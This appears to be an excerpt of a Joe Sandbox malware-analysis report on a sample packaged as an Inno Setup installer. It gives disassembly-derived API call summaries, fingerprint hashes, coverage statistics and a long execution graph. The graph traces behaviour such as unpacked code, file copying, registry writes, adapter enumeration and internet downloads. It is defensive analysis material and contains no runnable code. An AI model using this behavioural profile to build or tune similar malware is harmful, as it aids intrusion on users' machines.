                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                        • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                        • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                        • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                        • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,020D49BC,00003640,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                      • String ID: )
                                                                                                      • API String ID: 2227675388-1084416617
                                                                                                      • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                                      • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                      • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                                      • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                      APIs
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496539
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window
                                                                                                      • String ID: /INITPROCWND=$%x $@
                                                                                                      • API String ID: 2353593579-4169826103
                                                                                                      • Opcode ID: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                                                                      • Instruction ID: 8ac61a852f64af84e8a4d996ffe215da0ea6a1f7c0dd4c2642a2787a2d41e8fe
                                                                                                      • Opcode Fuzzy Hash: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                                                                      • Instruction Fuzzy Hash: C711A531A043089FDB01DF64E855BAE7BE8EB48324F52847BE404E7281DB3CE905CA58
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004474D6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$AllocByteCharFreeMultiWide
                                                                                                      • String ID: NIL Interface Exception$Unknown Method
                                                                                                      • API String ID: 3952431833-1023667238
                                                                                                      • Opcode ID: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                                                                      • Instruction ID: aafd2560cbf8ba646f5ae6954b41d26adab4393ec7197c17a1bba45f9511721b
                                                                                                      • Opcode Fuzzy Hash: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                                                                      • Instruction Fuzzy Hash: 0811D6306042049FEB10DFA59D42A6EBBACEB49704F91403AF504E7681C7789D01CB69
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD88
                                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDC8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$EnumQuery
                                                                                                      • String ID: Inno Setup: No Icons
                                                                                                      • API String ID: 1576479698-2016326496
                                                                                                      • Opcode ID: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                                                                      • Instruction ID: 05ef73584c9e0c756a5fead926ccd29af3c260b6948a855c27afe474e1c18ecb
                                                                                                      • Opcode Fuzzy Hash: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                                                                      • Instruction Fuzzy Hash: B2012B36F5A77179F73046256D02BBB56888B82B60F68453BF940EA2C0D6589C04C36E
                                                                                                      APIs
                                                                                                        • Part of subcall function 004555D0: GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                                        • Part of subcall function 004555D0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                                      • SetForegroundWindow.USER32(?), ref: 00497266
                                                                                                      Strings
                                                                                                      • Restarting Windows., xrefs: 00497243
                                                                                                      • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497291
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                                      • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                                      • API String ID: 3179053593-4147564754
                                                                                                      • Opcode ID: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                                                      • Instruction ID: f042dff5c045186d33be5417afa4f05d679b9763972d2bb00463d131ea403ed4
                                                                                                      • Opcode Fuzzy Hash: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                                                      • Instruction Fuzzy Hash: FD01D8706282406BEB00EB65E981B9C3F99AB5430CF5040BBF900A72D3D73C9945871D
                                                                                                      APIs
                                                                                                        • Part of subcall function 0047CD84: FreeLibrary.KERNEL32(74600000,004814B7), ref: 0047CD9A
                                                                                                        • Part of subcall function 0047CA54: GetTickCount.KERNEL32 ref: 0047CA9E
                                                                                                        • Part of subcall function 004570CC: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570EB
                                                                                                      • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049832B), ref: 00497A29
                                                                                                      • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049832B), ref: 00497A2F
                                                                                                      Strings
                                                                                                      • Detected restart. Removing temporary directory., xrefs: 004979E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                      • String ID: Detected restart. Removing temporary directory.
                                                                                                      • API String ID: 1717587489-3199836293
                                                                                                      • Opcode ID: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                                                      • Instruction ID: 93f06bea8fcfa1b224d7ac257058da4e76460d04d1e35911cc499d3d1c0dfa98
                                                                                                      • Opcode Fuzzy Hash: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                                                      • Instruction Fuzzy Hash: 51E0553120C3002EDA02B7B2BC52A2F7F8CD701728311083BF40882452C43D1810C77D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1458359878-0
                                                                                                      • Opcode ID: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                                                                      • Instruction ID: a2606c7dd4c17da0a3c90c20a229de96912268129783a4208f21052e6a4fbdd3
                                                                                                      • Opcode Fuzzy Hash: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                                                                      • Instruction Fuzzy Hash: 62F02436B01D64578F20A59E998193F63DDEA94376750013BFC0CDB303D438CC098AA9

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:11.7%
                                                                                                      Dynamic/Decrypted Code Coverage:83.4%
                                                                                                      Signature Coverage:3.2%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:43
                                                                                                      execution_graph 18939 40d440 18940 40d1b6 18939->18940 18941 40d456 RegCloseKey 18940->18941 18942 40d44f 18940->18942 18941->18942 21637 2bfe01e 21638 2bfe023 21637->21638 21642 2bcf97d LoadLibraryA 21638->21642 21639 2c08c16 21641 2bcf97d 64 API calls 21639->21641 21641->21639 21643 2bcf9a6 GetProcAddress 21642->21643 21644 2bcfa60 21642->21644 21645 2bcfa59 FreeLibrary 21643->21645 21648 2bcf9ba 21643->21648 21644->21639 21645->21644 21646 2bcf9cc GetAdaptersInfo 21646->21648 21647 2bcfa54 21647->21645 21648->21646 21648->21647 21648->21648 21649 2bd3b2c _Allocate 60 API calls 21648->21649 21649->21648 18943 402342 18944 402810 CopyFileA 18943->18944 18946 40d601 18944->18946 18947 40d243 18948 40d5c1 RegSetValueExA RegCloseKey 18947->18948 18949 40d5d0 18948->18949 18950 2c09483 18951 2c22bcc Sleep 18950->18951 21650 401f64 FindResourceA 21651 401f86 GetLastError SizeofResource 21650->21651 21656 401f9f 21650->21656 21652 401fa6 LoadResource LockResource GlobalAlloc 21651->21652 21651->21656 21653 401fd2 21652->21653 21654 401ffb GetTickCount 21653->21654 21657 402005 GlobalAlloc 21654->21657 21657->21656 21658 402865 21659 40d62b Sleep 21658->21659 21660 40d697 21659->21660 18953 40220b CreateDirectoryA 18954 40227e 18953->18954 18955 40230d RegOpenKeyExA 18956 40231b 18955->18956 18956->18956 21661 40276d 21662 402774 RegQueryValueExA 21661->21662 21664 40d1b6 21662->21664 21665 40d456 RegCloseKey 21664->21665 21666 40d44f 21664->21666 21665->21666 21667 40222f 21670 4021e4 21667->21670 21668 40d026 GetLastError 21669 40d9d4 21668->21669 21670->21668 21671 40d31a 21670->21671 21672 402eb0 GetVersion 21696 403ff4 HeapCreate 21672->21696 21674 402f0f 21675 402f14 21674->21675 21676 402f1c 21674->21676 21771 402fcb 21675->21771 21708 403cd4 21676->21708 21680 402f24 GetCommandLineA 21722 403ba2 21680->21722 21684 402f3e 21754 40389c 21684->21754 21686 402f43 
21687 402f48 GetStartupInfoA 21686->21687 21767 403844 21687->21767 21689 402f5a GetModuleHandleA 21691 402f7e 21689->21691 21777 4035eb 21691->21777 21695 402f98 21697 404014 21696->21697 21698 40404a 21696->21698 21784 403eac 21697->21784 21698->21674 21701 404030 21704 40404d 21701->21704 21705 404c1c 5 API calls 21701->21705 21702 404023 21796 4043cb HeapAlloc 21702->21796 21704->21674 21706 40402d 21705->21706 21706->21704 21707 40403e HeapDestroy 21706->21707 21707->21698 21852 402fef 21708->21852 21711 403cf3 GetStartupInfoA 21714 403e04 21711->21714 21721 403d3f 21711->21721 21715 403e2b GetStdHandle 21714->21715 21716 403e6b SetHandleCount 21714->21716 21715->21714 21718 403e39 GetFileType 21715->21718 21716->21680 21717 402fef 12 API calls 21717->21721 21718->21714 21719 403db0 21719->21714 21720 403dd2 GetFileType 21719->21720 21720->21719 21721->21714 21721->21717 21721->21719 21723 403bf0 21722->21723 21724 403bbd GetEnvironmentStringsW 21722->21724 21725 403bc5 21723->21725 21726 403be1 21723->21726 21724->21725 21727 403bd1 GetEnvironmentStrings 21724->21727 21729 403c09 WideCharToMultiByte 21725->21729 21730 403bfd GetEnvironmentStringsW 21725->21730 21728 402f34 21726->21728 21731 403c83 GetEnvironmentStrings 21726->21731 21732 403c8f 21726->21732 21727->21726 21727->21728 21745 403955 21728->21745 21734 403c3d 21729->21734 21735 403c6f FreeEnvironmentStringsW 21729->21735 21730->21728 21730->21729 21731->21728 21731->21732 21736 402fef 12 API calls 21732->21736 21737 402fef 12 API calls 21734->21737 21735->21728 21743 403caa 21736->21743 21738 403c43 21737->21738 21738->21735 21739 403c4c WideCharToMultiByte 21738->21739 21741 403c66 21739->21741 21742 403c5d 21739->21742 21740 403cc0 FreeEnvironmentStringsA 21740->21728 21741->21735 21744 4030a1 7 API calls 21742->21744 21743->21740 21744->21741 21746 403967 21745->21746 21747 40396c GetModuleFileNameA 21745->21747 21881 4061b4 21746->21881 21749 40398f 21747->21749 21750 402fef 12 API calls 
21749->21750 21751 4039b0 21750->21751 21752 4039c0 21751->21752 21753 402fa6 7 API calls 21751->21753 21752->21684 21753->21752 21755 4038a9 21754->21755 21757 4038ae 21754->21757 21756 4061b4 19 API calls 21755->21756 21756->21757 21758 402fef 12 API calls 21757->21758 21759 4038db 21758->21759 21760 402fa6 7 API calls 21759->21760 21765 4038ef 21759->21765 21760->21765 21761 4030a1 7 API calls 21762 40393e 21761->21762 21762->21686 21763 402fef 12 API calls 21763->21765 21764 403932 21764->21761 21765->21763 21765->21764 21766 402fa6 7 API calls 21765->21766 21766->21765 21768 40384d 21767->21768 21770 403852 21767->21770 21769 4061b4 19 API calls 21768->21769 21769->21770 21770->21689 21772 402fd4 21771->21772 21773 402fd9 21771->21773 21774 404224 7 API calls 21772->21774 21775 40425d 7 API calls 21773->21775 21774->21773 21776 402fe2 ExitProcess 21775->21776 21905 40360d 21777->21905 21780 4036c0 21781 4036cc 21780->21781 21782 4037f5 UnhandledExceptionFilter 21781->21782 21783 4036e0 21781->21783 21782->21783 21783->21695 21783->21783 21798 402d40 21784->21798 21787 403ed5 21788 403eef GetEnvironmentVariableA 21787->21788 21789 403ee7 21787->21789 21791 403f0e 21788->21791 21795 403fcc 21788->21795 21789->21701 21789->21702 21792 403f53 GetModuleFileNameA 21791->21792 21793 403f4b 21791->21793 21792->21793 21793->21795 21800 4061d0 21793->21800 21795->21789 21803 403e7f GetModuleHandleA 21795->21803 21797 4043e7 21796->21797 21797->21706 21799 402d4c GetVersionExA 21798->21799 21799->21787 21799->21788 21805 4061e7 21800->21805 21804 403e96 21803->21804 21804->21789 21807 4061ff 21805->21807 21809 40622f 21807->21809 21812 4053a6 21807->21812 21808 4053a6 6 API calls 21808->21809 21809->21808 21811 4061e3 21809->21811 21816 4073ab 21809->21816 21811->21795 21813 4053b8 21812->21813 21814 4053c4 21812->21814 21813->21807 21822 40670e 21814->21822 21817 4073d6 21816->21817 21820 4073b9 21816->21820 21818 4053a6 6 API calls 21817->21818 21819 4073f2 
21817->21819 21818->21819 21819->21820 21834 406857 21819->21834 21820->21809 21823 406757 21822->21823 21824 40673f GetStringTypeW 21822->21824 21825 406782 GetStringTypeA 21823->21825 21826 4067a6 21823->21826 21824->21823 21827 40675b GetStringTypeA 21824->21827 21829 406843 21825->21829 21826->21829 21830 4067bc MultiByteToWideChar 21826->21830 21827->21823 21827->21829 21829->21813 21830->21829 21831 4067e0 21830->21831 21831->21829 21832 40681a MultiByteToWideChar 21831->21832 21832->21829 21833 406833 GetStringTypeW 21832->21833 21833->21829 21835 406887 LCMapStringW 21834->21835 21836 4068a3 21834->21836 21835->21836 21837 4068ab LCMapStringA 21835->21837 21838 406909 21836->21838 21839 4068ec LCMapStringA 21836->21839 21837->21836 21840 4069e5 21837->21840 21838->21840 21841 40691f MultiByteToWideChar 21838->21841 21839->21840 21840->21820 21841->21840 21842 406949 21841->21842 21842->21840 21843 40697f MultiByteToWideChar 21842->21843 21843->21840 21844 406998 LCMapStringW 21843->21844 21844->21840 21845 4069b3 21844->21845 21846 4069b9 21845->21846 21848 4069f9 21845->21848 21846->21840 21847 4069c7 LCMapStringW 21846->21847 21847->21840 21848->21840 21849 406a31 LCMapStringW 21848->21849 21849->21840 21850 406a49 WideCharToMultiByte 21849->21850 21850->21840 21853 403001 12 API calls 21852->21853 21854 402ffe 21853->21854 21854->21711 21855 402fa6 21854->21855 21856 402fb4 21855->21856 21857 402faf 21855->21857 21867 40425d 21856->21867 21861 404224 21857->21861 21862 40422e 21861->21862 21863 40425b 21862->21863 21864 40425d 7 API calls 21862->21864 21863->21856 21865 404245 21864->21865 21866 40425d 7 API calls 21865->21866 21866->21863 21870 404270 21867->21870 21868 402fbd 21868->21711 21869 404387 21873 40439a GetStdHandle WriteFile 21869->21873 21870->21868 21870->21869 21871 4042b0 21870->21871 21871->21868 21872 4042bc GetModuleFileNameA 21871->21872 21874 4042d4 21872->21874 21873->21868 21876 406578 21874->21876 21877 406585 LoadLibraryA 
21876->21877 21879 4065c7 21876->21879 21878 406596 GetProcAddress 21877->21878 21877->21879 21878->21879 21880 4065ad GetProcAddress GetProcAddress 21878->21880 21879->21868 21880->21879 21882 4061bd 21881->21882 21883 4061c4 21881->21883 21885 405df0 21882->21885 21883->21747 21892 405f89 21885->21892 21887 405f7d 21887->21883 21890 405e33 GetCPInfo 21891 405e47 21890->21891 21891->21887 21897 40602f GetCPInfo 21891->21897 21893 405fa9 21892->21893 21894 405f99 GetOEMCP 21892->21894 21895 405e01 21893->21895 21896 405fae GetACP 21893->21896 21894->21893 21895->21887 21895->21890 21895->21891 21896->21895 21898 40611a 21897->21898 21902 406052 21897->21902 21898->21887 21899 40670e 6 API calls 21900 4060ce 21899->21900 21901 406857 9 API calls 21900->21901 21903 4060f2 21901->21903 21902->21899 21904 406857 9 API calls 21903->21904 21904->21898 21906 403619 GetCurrentProcess TerminateProcess 21905->21906 21907 40362a 21905->21907 21906->21907 21908 402f87 21907->21908 21909 403694 ExitProcess 21907->21909 21908->21780 21910 2bc104d 21911 2bd3384 __cinit 68 API calls 21910->21911 21912 2bc1057 21911->21912 21915 2bc1aa9 InterlockedIncrement 21912->21915 21916 2bc105c 21915->21916 21917 2bc1ac5 WSAStartup InterlockedExchange 21915->21917 21917->21916 18957 2bd3cef 18958 2bd3cfd 18957->18958 18959 2bd3cf8 18957->18959 18963 2bd3d12 18958->18963 18971 2bdb8c1 18959->18971 18962 2bd3d0b 18964 2bd3d1e __mtinitlocknum 18963->18964 18968 2bd3d6c ___DllMainCRTStartup 18964->18968 18970 2bd3dc9 __mtinitlocknum 18964->18970 18975 2bd3b7d 18964->18975 18966 2bd3da6 18967 2bd3b7d __CRT_INIT@12 138 API calls 18966->18967 18966->18970 18967->18970 18968->18966 18969 2bd3b7d __CRT_INIT@12 138 API calls 18968->18969 18968->18970 18969->18966 18970->18962 18972 2bdb8e4 18971->18972 18973 2bdb8f1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 18971->18973 18972->18973 18974 2bdb8e8 18972->18974 18973->18974 18974->18958 18976 2bd3b89 
__mtinitlocknum 18975->18976 18977 2bd3c0b 18976->18977 18978 2bd3b91 18976->18978 18980 2bd3c0f 18977->18980 18981 2bd3c74 18977->18981 19023 2bd81c6 GetProcessHeap 18978->19023 18985 2bd3c30 18980->18985 19016 2bd3b9a __mtinitlocknum __CRT_INIT@12 18980->19016 19124 2bd843b 18980->19124 18982 2bd3c79 18981->18982 18983 2bd3cd7 18981->18983 19155 2bd91ab 18982->19155 18983->19016 19183 2bd5c04 18983->19183 18984 2bd3b96 18984->19016 19024 2bd5d74 18984->19024 19127 2bd8312 RtlDecodePointer 18985->19127 18990 2bd3c84 18990->19016 19158 2bd8a4c 18990->19158 18992 2bd3ba6 __RTC_Initialize 19000 2bd3bb6 GetCommandLineA 18992->19000 18992->19016 18995 2bd3c46 __CRT_INIT@12 19151 2bd3c5f 18995->19151 18997 2bdb55f __ioterm 60 API calls 18999 2bd3c41 18997->18999 19002 2bd5dea __mtterm 62 API calls 18999->19002 19045 2bdb95d GetEnvironmentStringsW 19000->19045 19002->18995 19004 2bd3cad 19006 2bd3ccb 19004->19006 19007 2bd3cb3 19004->19007 19177 2bd2f54 19006->19177 19167 2bd5cc1 19007->19167 19011 2bd3bd0 19013 2bd3bd4 19011->19013 19077 2bdb5b1 19011->19077 19012 2bd3cbb GetCurrentThreadId 19012->19016 19110 2bd5dea 19013->19110 19016->18968 19018 2bd3bf4 19018->19016 19119 2bdb55f 19018->19119 19023->18984 19191 2bd84e2 RtlEncodePointer 19024->19191 19026 2bd5d79 19196 2bd89fe 19026->19196 19029 2bd5d82 19030 2bd5dea __mtterm 62 API calls 19029->19030 19032 2bd5d87 19030->19032 19032->18992 19034 2bd5d9f 19035 2bd8a4c __calloc_crt 59 API calls 19034->19035 19036 2bd5dac 19035->19036 19037 2bd5de1 19036->19037 19038 2bd91ca __getptd_noexit TlsSetValue 19036->19038 19039 2bd5dea __mtterm 62 API calls 19037->19039 19041 2bd5dc0 19038->19041 19040 2bd5de6 19039->19040 19040->18992 19041->19037 19042 2bd5dc6 19041->19042 19043 2bd5cc1 __initptd 59 API calls 19042->19043 19044 2bd5dce GetCurrentThreadId 19043->19044 19044->18992 19046 2bd3bc6 19045->19046 19047 2bdb970 WideCharToMultiByte 19045->19047 19058 2bdb2ab 19046->19058 19049 2bdb9da FreeEnvironmentStringsW 
19047->19049 19050 2bdb9a3 19047->19050 19049->19046 19207 2bd8a94 19050->19207 19053 2bdb9b0 WideCharToMultiByte 19054 2bdb9cf FreeEnvironmentStringsW 19053->19054 19055 2bdb9c6 19053->19055 19054->19046 19056 2bd2f54 _free 59 API calls 19055->19056 19057 2bdb9cc 19056->19057 19057->19054 19059 2bdb2b7 __mtinitlocknum 19058->19059 19060 2bd88cd __lock 59 API calls 19059->19060 19061 2bdb2be 19060->19061 19062 2bd8a4c __calloc_crt 59 API calls 19061->19062 19063 2bdb2cf 19062->19063 19064 2bdb33a GetStartupInfoW 19063->19064 19065 2bdb2da __mtinitlocknum @_EH4_CallFilterFunc@8 19063->19065 19071 2bdb34f 19064->19071 19074 2bdb47e 19064->19074 19065->19011 19066 2bdb546 19457 2bdb556 19066->19457 19068 2bd8a4c __calloc_crt 59 API calls 19068->19071 19069 2bdb4cb GetStdHandle 19069->19074 19070 2bdb4de GetFileType 19070->19074 19071->19068 19072 2bdb39d 19071->19072 19071->19074 19073 2bdb3d1 GetFileType 19072->19073 19072->19074 19075 2bd91ec __mtinitlocknum InitializeCriticalSectionAndSpinCount 19072->19075 19073->19072 19074->19066 19074->19069 19074->19070 19076 2bd91ec __mtinitlocknum InitializeCriticalSectionAndSpinCount 19074->19076 19075->19072 19076->19074 19078 2bdb5bf 19077->19078 19079 2bdb5c4 GetModuleFileNameA 19077->19079 19467 2bd526a 19078->19467 19081 2bdb5f1 19079->19081 19461 2bdb664 19081->19461 19084 2bd8a94 __malloc_crt 59 API calls 19085 2bdb62a 19084->19085 19086 2bdb664 _parse_cmdline 59 API calls 19085->19086 19087 2bd3be0 19085->19087 19086->19087 19087->19018 19088 2bdb7e0 19087->19088 19089 2bdb7e9 19088->19089 19092 2bdb7ee _strlen 19088->19092 19091 2bd526a ___initmbctable 71 API calls 19089->19091 19090 2bd3be9 19090->19018 19104 2bd844a 19090->19104 19091->19092 19092->19090 19093 2bd8a4c __calloc_crt 59 API calls 19092->19093 19095 2bdb824 _strlen 19093->19095 19094 2bd2f54 _free 59 API calls 19094->19090 19095->19090 19096 2bd8a4c __calloc_crt 59 API calls 19095->19096 19097 2bdb876 19095->19097 19098 2bdb89d 19095->19098 19101 
Execution Graph (call-graph node/edge export; truncated at both ends, node ids 18985-21251, edges written as from->to)

The raw node/edge listing is omitted here; what it records is summarised below.

Code location: every node but two lies in the range 2bc1815-2be53d0, outside the image's own 0x40xxxx range; the two in-image nodes are 4025d4 (LoadLibraryExA) and 40d169. That fits the unpacking signatures above: the graphed code runs from a separately allocated, unpacked region, and the original image appears only at one LoadLibraryExA call site.

Windows APIs resolved in the graph (node address in parentheses for the ones worth pivoting on):
WinINet: InternetOpenA (2bc72ab), InternetSetOptionA x3 (2bc72c9), InternetOpenUrlA (2bc7322), InternetReadFile (2bc7346) in a read loop, InternetCloseHandle (2bc7377, 2bc7382)
Winsock: WSASocketA (2bc2edd), setsockopt, getsockopt, ioctlsocket, connect (2bc2ae8), select, WSASend (2bc2d39), WSARecv (2bc2be2), shutdown, closesocket, htons (2bc3d99, 2bc3dcb), htonl (2bc3db7), CreateIoCompletionPort (2bc35ad), PostQueuedCompletionStatus (2bc23c1), WSASetLastError, WSAGetLastError
